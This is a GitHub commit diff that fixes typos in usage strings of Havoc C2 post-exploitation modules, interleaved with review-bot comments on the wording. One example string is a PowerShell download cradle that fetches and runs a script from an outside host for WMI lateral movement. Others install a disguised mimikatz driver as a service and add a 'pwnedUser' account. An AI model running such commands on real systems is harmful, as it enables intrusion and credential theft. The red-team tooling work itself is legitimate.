Merge pull request #26 from jabra-/spellcheck
spellcheck
S4ntiagoP authored Jan 6, 2024
2 parents a76ef0d + 68768c8 commit 87bf85d
Showing 6 changed files with 15 additions and 15 deletions.
2 changes: 1 addition & 1 deletion InvokeAssembly/invokeassembly.py
Expand Up @@ -37,4 +37,4 @@ def InvokeAssembly( demonID, *param ):

return TaskID

RegisterCommand( InvokeAssembly, "dotnet", "execute", "executes a dotnet assembly in a seperate process", 0, "[/path/to/assembl.exe] (args)", "/tmp/Seatbelt.exe -group=user" )
RegisterCommand( InvokeAssembly, "dotnet", "execute", "executes a dotnet assembly in a separate process", 0, "[/path/to/assembly.exe] (args)", "/tmp/Seatbelt.exe -group=user" )
2 changes: 1 addition & 1 deletion Jump-exec/Psexec/psexec.c
Expand Up @@ -166,5 +166,5 @@ VOID go( PVOID Buffer, ULONG Length )
if ( Success )
BeaconPrintf( HAVOC_CONSOLE_GOOD, "psexec successful executed on %s", Host );
else
BeaconPrintf( HAVOC_CONSOLE_ERRO, "psexec failed to execut on %s", Host );
BeaconPrintf( HAVOC_CONSOLE_ERRO, "psexec failed to execute on %s", Host );
}
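Review bot: The success message one line above the corrected string still reads `psexec successful executed on %s`; it should be `psexec successfully executed on %s`, and the same wording remains in `scshell successful executed on %s` in Jump-exec/ScShell/scshell.c. Both branches print to the operator console, so they should read consistently. Any log parsing or detection content keyed on the old misspelled failure text would presumably need to match both spellings after this change. The body of go() starts outside the hunk.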
2 changes: 1 addition & 1 deletion Jump-exec/ScShell/scshell.c
Expand Up @@ -214,5 +214,5 @@ VOID go( PVOID Buffer, ULONG Length )
if ( Success )
BeaconPrintf( CALLBACK_OUTPUT, "scshell successful executed on %s", Host );
else
BeaconPrintf( CALLBACK_ERROR, "scshell failed to execut on %s", Host );
BeaconPrintf( CALLBACK_ERROR, "scshell failed to execute on %s", Host );
}
4 changes: 2 additions & 2 deletions Jump-exec/WMI/wmi.py
Expand Up @@ -113,5 +113,5 @@ def wmi_proccreate( demonID, *params ):
return TaskID

RegisterModule( "jump-exec", "lateral movement module", "", "[exploit] (args)", "", "" )
RegisterCommand( wmi_eventsub, "jump-exec", "wmi-eventsub", "Run a VBscript via WMI for lateral movement", 0, "target local_script_path <otp:username> <otp:password> <otp:domain>", "10.10.10.10 /tmp/demon.vba" )
RegisterCommand( wmi_proccreate, "jump-exec", "wmi-proccreate", "Create a process via WMI for lateral movement", 0, "target command <otp:username> <otp:password> <otp:domain>", "10.10.10.10 \"powershell.exe (new-object system.net.webclient).downloadstring('http://192.168.49.100:8888/run.txt') | IEX\"" )
RegisterCommand( wmi_eventsub, "jump-exec", "wmi-eventsub", "Run a VBscript via WMI for lateral movement", 0, "target local_script_path <opt:username> <opt:password> <opt:domain>", "10.10.10.10 /tmp/demon.vba" )
RegisterCommand( wmi_proccreate, "jump-exec", "wmi-proccreate", "Create a process via WMI for lateral movement", 0, "target command <opt:username> <opt:password> <opt:domain>", "10.10.10.10 \"powershell.exe (new-object system.net.webclient).downloadstring('http://192.168.49.100:8888/run.txt') | IEX\"" )
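Review bot: The corrected usage strings write optional arguments as `<opt:username>`, while SituationalAwareness.py in this same commit uses `[opt: server]` and RemoteOps.py uses `<OPT:HOSTNAME>`; a single notation across the modules would make the help output easier to read. Both example strings also omit the optional username, password and domain, so the help never shows them in position. A second example with placeholder values, such as `10.10.10.10 /tmp/demon.vba <username> <password> <domain>`, would document the order.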
14 changes: 7 additions & 7 deletions RemoteOps/RemoteOps.py
Expand Up @@ -619,7 +619,7 @@ def adduser( demonID, *params ):

return TaskID

RegisterCommand( adcs_request, "", "adcs_request", "Request an enrollment certificate", 0, "/CA:ca [/TEMPLATE:template] [/SUBJECT:subject] [/ALTNAME:altname] [/INSTALL] [/MACHINE]", "1337 c:\\windwos\\temp\\test.txt" )
RegisterCommand( adcs_request, "", "adcs_request", "Request an enrollment certificate", 0, "/CA:ca [/TEMPLATE:template] [/SUBJECT:subject] [/ALTNAME:altname] [/INSTALL] [/MACHINE]", "1337 c:\\windows\\temp\\test.txt" )
RegisterCommand( addusertogroup, "", "addusertogroup", "Add the specified user to the specified group", 0, """<USERNAME> <GROUPNAME> <Server> <DOMAIN>
USERNAME Required. The user name to activate/enable.
GROUPNAME Required. The group to add the user to.
Expand All @@ -640,7 +640,7 @@ def adduser( demonID, *params ):
the domain name for the user if it is a domain account, or
use \"\" to target an account on the local machine.""", "pwnedUser Password123! computer132 \"\"" )
RegisterCommand( reg_delete, "", "reg_delete", "Deletes the registry key or value", 0, """<OPT:HOSTNAME> <HIVE> <REGPATH> <OPT:REGVALUE>
HOSTNAME Optional. The host to connect to and run the commnad on.
HOSTNAME Optional. The host to connect to and run the command on.
HIVE Required. The registry hive containing the REGPATH. Possible
values:
HKLM
Expand All @@ -662,7 +662,7 @@ def adduser( demonID, *params ):
FILEOUT Required. The output file.
Note: The FILEOUT is saved to disk on target, so don't forget to clean up.""", "HKLM Some\\Path c:\\windows\\temp\\reg.txt" )
RegisterCommand( reg_set, "", "reg_set", "This command creates or sets the specified registry key (or value) on the target host.", 0, """<OPT:HOSTNAME> <HIVE> <REGPATH> <KEY> <TYPE> <DATA>
HOSTNAME Optional. The host to connect to and run the commnad on.
HOSTNAME Optional. The host to connect to and run the command on.
HIVE Required. The registry hive containing the REGPATH. Possible
values:
HKLM
Expand Down Expand Up @@ -707,24 +707,24 @@ def adduser( demonID, *params ):
2 - SERVICE_KERNEL_DRIVER (Driver service)
3 - SERVICE_WIN32_OWN_PROCESS (Service that runs in its own process) <-- Default
4 - SERVICE_WIN32_SHARE_PROCESS (Service that shares a process with one or more other services)
HOSTNAME Optional. The host to connect to and run the commnad on. The
HOSTNAME Optional. The host to connect to and run the command on. The
local system is targeted if a HOSTNAME is not specified.""", "mimidrv mimidrv C:\\Windows\\Temp\\mimidrv.sys \"\" 0 3 2" )
RegisterCommand( sc_start, "", "sc_start", "This command starts the specified service on the target host.", 0, """<SVCNAME> <OPT:HOSTNAME>
SVCNAME Required. The name of the service to start.
HOSTNAME Optional. The host to connect to and run the command on. The
local system is targeted if a HOSTNAME is not specified.""", "mimidrv" )
RegisterCommand( sc_stop, "", "sc_stop", "This command stops the specified service on the target host.", 0, """<SVCNAME> <OPT:HOSTNAME>
SVCNAME Required. The name of the service to stop.
HOSTNAME Optional. The host to connect to and run the commnad on. The
HOSTNAME Optional. The host to connect to and run the command on. The
local system is targeted if a HOSTNAME is not specified.""", "mimidrv" )
RegisterCommand( sc_delete, "", "sc_delete", "This command deletes the specified service on the target host.", 0, """<SVCNAME> <OPT:HOSTNAME>
SVCNAME Required. The name of the service to delete.
HOSTNAME Optional. The host to connect to and run the commnad on. The
HOSTNAME Optional. The host to connect to and run the command on. The
local system is targeted if a HOSTNAME is not specified.""", "mimidrv" )
RegisterCommand( sc_description, "", "sc_description", "This command sets the description of an existing service on the target host.", 0, """<SVCNAME> <DESCRIPTION> <OPT:HOSTNAME>
SVCNAME Required. The name of the service to create.
DESCRIPTION Required. The description of the service.
HOSTNAME Optional. The host to connect to and run the commnad on. The
HOSTNAME Optional. The host to connect to and run the command on. The
local system is targeted if a HOSTNAME is not specified.""", "mimidrv \"definitely not a mimikatz kernel driver\"" )
RegisterCommand( adduser, "", "adduser", "Add a new user to a machine.", 0, """<USERNAME> <PASSWORD> <SERVER>
USERNAME Required. The name of the new user.
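Review bot: The adcs_request example string, `1337 c:\\windows\\temp\\test.txt`, does not follow the command's own usage (`/CA:ca [/TEMPLATE:template] ...`); it looks copied from another command, so correcting the spelling of `windows` still leaves it misleading. An example in the documented form, for instance `/CA:<ca> /TEMPLATE:<template>` with placeholder values, would match the usage line. In the same section the sc_description help describes SVCNAME as `The name of the service to create.`, which presumably should refer to the existing service whose description is being set. Only part of the file is visible in these hunks.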
6 changes: 3 additions & 3 deletions SituationalAwareness/SituationalAwareness.py
Expand Up @@ -1468,15 +1468,15 @@ def sa_tasklist( demonID, *params ):
RegisterCommand( schtasksenum, "", "schtasksenum", "Enumerate scheduled tasks on the local or remote computer", 0, "[opt: server]", "" )
RegisterCommand( schtasksquery, "", "schtasksquery", "Query the given task on the local or remote computer", 0, "[opt: server] [taskpath]", "" )
RegisterCommand( sc_enum, "", "sc_enum", "Enumerate services for qc, query, qfailure, and qtriggers info", 0, "[opt: server]", "" )
RegisterCommand( sc_qc, "", "sc_qc", "sc qc impelmentation in BOF", 0, "service_name [opt:server]", "SensorService" )
RegisterCommand( sc_qc, "", "sc_qc", "sc qc implementation in BOF", 0, "service_name [opt:server]", "SensorService" )
RegisterCommand( sc_query, "", "sc_query", "sc query implementation in BOF", 0, "[opt: service name] [opt: server]", "" )
RegisterCommand( sc_qdescription, "", "sc_qdescription", "Queries a services description", 0, "service_name [opt: server]", "SensorService" )
RegisterCommand( sc_qfailure, "", "sc_qfailure", "Query a service for failure conditions", 0, "service_name [opt: server]", "SensorService" )
RegisterCommand( sc_qtriggerinfo, "", "sc_qtriggerinfo", "Query a service for trigger conditions", 0, "service_name [opt: server]", "SensorService" )
RegisterCommand( adcs_enum, "", "adcs_enum", "Enumerate CAs and templates in the AD using Win32 functions", 0, "[opt: domain]", "" )
RegisterCommand( enumlocalsessions, "", "enumlocalsessions", "Enumerate currently attached user sessions both local and over RDP", 0, "", "" )
RegisterCommand( enum_filter_driver, "", "enum_filter_driver", "Enumerate filter drivers", 0, "[opt: system]", "" )
RegisterCommand( ldapsearch, "", "ldapsearch", "Execute LDAP searches (NOTE: specify *,ntsecuritydescriptor as attribute parameter if you want all attributes + base64 encoded ACL of the objects, this can then be resolved using BOFHound. Could possibly break pagination, although everything seemed fine during testing.)", 0, "query [opt: attribute] [opt: results_limit] [opt: DC hostname or IP] [opt: Distingished Name]", "\"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))\"" )
RegisterCommand( ldapsearch, "", "ldapsearch", "Execute LDAP searches (NOTE: specify *,ntsecuritydescriptor as attribute parameter if you want all attributes + base64 encoded ACL of the objects, this can then be resolved using BOFHound. Could possibly break pagination, although everything seemed fine during testing.)", 0, "query [opt: attribute] [opt: results_limit] [opt: DC hostname or IP] [opt: Distinguished Name]", "\"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))\"" )
RegisterCommand( netsession, "", "get-netsession", "Enumerate sessions on the local or specified computer", 0, "[opt:computer]", "" )
RegisterCommand( netGroupList, "", "netGroupList", "List groups from the default or specified domain", 0, "[opt: domain]", "" )
RegisterCommand( netGroupListMembers, "", "netGroupListMembers", "List group members from the default or specified domain", 0, "groupname [opt: domain]", "" )
Expand All @@ -1490,6 +1490,6 @@ def sa_tasklist( demonID, *params ):
RegisterCommand( netsharesAdmin, "", "netsharesAdmin", "List shares on local or remote computer and gets more info then standard netshares (requires admin)", 0, "[opt: \\\\computername]", "" )
RegisterCommand( netuptime, "", "netuptime", "Returns information about the boot time on the local (or a remote) machine", 0, "[opt: hostname]", "" )
RegisterCommand( netview, "", "netview", "lists local workstations and servers", 0, "[opt: netbios_domain_name]", "" )
RegisterCommand( quser, "", "quser", "Simple implementation of quser.exe usingt the Windows API", 0, "<OPT:TARGET>", "10.10.10.10" )
RegisterCommand( quser, "", "quser", "Simple implementation of quser.exe using the Windows API", 0, "<OPT:TARGET>", "10.10.10.10" )
#RegisterCommand( bofdir, "", "bofdir", "Lists a target directory using BOF.", 0, "[directory] [/s]", "C:\\Windows\\Temp" )
RegisterCommand( sa_tasklist, "", "tasklist", "This command displays a list of currently running processes on either a local or remote machine.", 0, "[hostname]", "" )
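Review bot: Two wording errors survive in the lines this section shows: the netsharesAdmin description still says `gets more info then standard netshares` (should be `than`), and sc_qdescription says `Queries a services description` (should be `service's`). The commented-out `#RegisterCommand( bofdir, ...` line is dead code; it should either be removed or carry a comment saying why the command is disabled. The tasklist usage `[hostname]` would also read more clearly as an optional argument, since its description covers both the local and a remote machine.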
